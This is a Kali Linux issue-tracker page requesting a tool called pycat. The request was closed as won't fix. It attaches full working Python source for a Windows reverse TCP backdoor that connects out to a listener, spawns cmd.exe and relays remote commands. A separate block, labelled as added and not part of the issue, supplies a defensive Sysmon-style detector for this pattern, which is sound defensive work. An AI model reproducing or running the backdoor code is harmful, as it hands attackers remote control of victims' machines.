View Issue Details

ID: 0005412
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2019-10-28 13:34
Reporter: danielhnmoreno
Assigned To:
Priority: normal
Severity: feature
Reproducibility: always
Status: closed
Resolution: won't fix
Product Version: 2019.1
Summary: 0005412: pycat - Windows Reverse TCP backdoor
Description

pycat is similar to a netcat reverse cmd prompt shell.

Demo: youtube.com/watch?v=3sMhHL6c68E
GitHub: github.com/danielhnmoreno/pycat

Steps To Reproduce

Usage (Windows only with Python 3 installed):
python pycat.py --host NETCAT_IP_LISTENER --port PORT

Attached Files
pycat.py (2,332 bytes)   
import asyncio
import socket
import argparse

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 
                                 description="###############         pycat         ###############\n" \
                                             "          Windows Reverse TCP backdoor\n"
                                             "Usage: python pycat.py --host netcatIP --port PORT\n\n" \
                                             "Demo:    youtube.com/watch?v=3sMhHL6c68E\n"\
                                             "GitHub:  github.com/danielhnmoreno/pycat\n" \
                                             "Contact: [email protected]")

parser.add_argument('--host', action = 'store', dest = 'host', required = True, help = 'Host listening for reverse connection')
parser.add_argument('--port', action = 'store', type=int, dest = 'port', required = True, help = 'Port')

arguments = parser.parse_args()

HOST = arguments.host
PORT = arguments.port


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

async def shell():
    while 1:
        proc = await asyncio.create_subprocess_shell("cmd",
                                                     stdin=asyncio.subprocess.PIPE,
                                                     stdout=asyncio.subprocess.PIPE,
                                                     stderr=asyncio.subprocess.STDOUT)
        cmd = b"\n"
        proc.stdin.write(cmd)

        while 1:
            while 1:
                out = await proc.stdout.readline()
                break_ = out.decode("latin-1")
                if break_[-2:] == ">\n" or break_[-3:] == "> \n":
                    s.send(out[:-1])
                    break
                elif break_.endswith(">" + cmd.decode()) or break_.endswith("> " + cmd.decode()):
                    pass
                else:
                    s.send(out)

            cmd = s.recv(1024)
            cmd_ = cmd.decode()
            if cmd_ == "\n":
                proc.stdin.write(b"\n")
            elif cmd_.startswith("exit"):
                proc.terminate()
                break
            else:
                proc.stdin.write(cmd + b"\n")

asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(shell())

Activities

g0tmi1k


2019-10-28 13:34

administrator   ~0011239

Not sure what this brings to the table.
You can easily do this with netcat/bash (such as disabling Ctrl + C)
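
On a monitored Windows host, the script attached to this issue appears as a Python interpreter that opens an outbound TCP connection and spawns cmd.exe as a child. The following is an added example (not part of this issue or of pycat) that correlates those two signals over constructed, simplified Sysmon-style records; the record layout, paths, PIDs and addresses are assumptions for illustration.

```python
# Constructed, simplified Sysmon-style records (EventID 1 = process creation,
# EventID 3 = network connection). Paths, PIDs and addresses are made up.
PY = r"C:\Python37\python.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"EventID": 3, "ProcessId": 4120, "Image": PY, "Initiated": True,
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
    {"EventID": 1, "ProcessId": 5200, "ParentProcessId": 4120, "Image": CMD,
     "ParentImage": PY, "CommandLine": CMD + ' /c "cmd"'},
    # Benign: Python makes an outbound connection but never spawns a shell.
    {"EventID": 3, "ProcessId": 6001, "Image": PY, "Initiated": True,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    # Benign: a script shells out but has no outbound connection.
    {"EventID": 1, "ProcessId": 7100, "ParentProcessId": 7000, "Image": CMD,
     "ParentImage": PY, "CommandLine": CMD + ' /c "dir"'},
]

INTERPRETERS = {"python.exe", "pythonw.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def exe_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_interpreter_shells(events):
    """Flag interpreter PIDs that both connected out and spawned a shell.

    Correlation is by PID only and order-independent; a production rule
    should also key on host and process GUID to survive PID reuse.
    """
    outbound, shells = {}, {}
    for ev in events:
        image = exe_name(ev["Image"])
        if ev["EventID"] == 3 and ev.get("Initiated") and image in INTERPRETERS:
            dest = (ev["DestinationIp"], ev["DestinationPort"])
            outbound.setdefault(ev["ProcessId"], []).append(dest)
        elif (ev["EventID"] == 1 and image in SHELLS
              and exe_name(ev["ParentImage"]) in INTERPRETERS):
            shells.setdefault(ev["ParentProcessId"], []).append(ev["CommandLine"])
    return [{"pid": pid, "destinations": outbound[pid], "shell_cmdlines": shells[pid]}
            for pid in sorted(outbound.keys() & shells.keys())]


if __name__ == "__main__":
    for alert in find_interpreter_shells(SAMPLE_EVENTS):
        print(alert)
```

Only PID 4120 is flagged in the sample data: the two benign interpreters each show one of the signals but not both.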

Issue History

Date Modified Username Field Change
2019-04-26 22:42 danielhnmoreno New Issue
2019-04-26 22:42 danielhnmoreno File Added: pycat.py
2019-10-28 13:34 g0tmi1k Note Added: 0011239
2019-10-28 13:34 g0tmi1k Status new => closed
2019-10-28 13:34 g0tmi1k Resolution open => won't fix